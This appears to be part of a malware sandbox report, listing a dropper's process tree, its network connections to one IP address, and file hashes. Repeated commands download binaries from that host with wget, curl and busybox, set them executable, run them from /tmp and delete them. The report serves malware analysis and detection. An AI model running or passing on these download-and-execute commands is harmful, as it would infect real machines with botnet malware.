[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/chmod

[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE

[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/rm

[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/wget

[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/chmod

[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC

[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/rm

[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/wget

[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/chmod

[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz

[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/rm

[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/wget

[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/chmod

[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6

[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/rm

[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/wget

[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97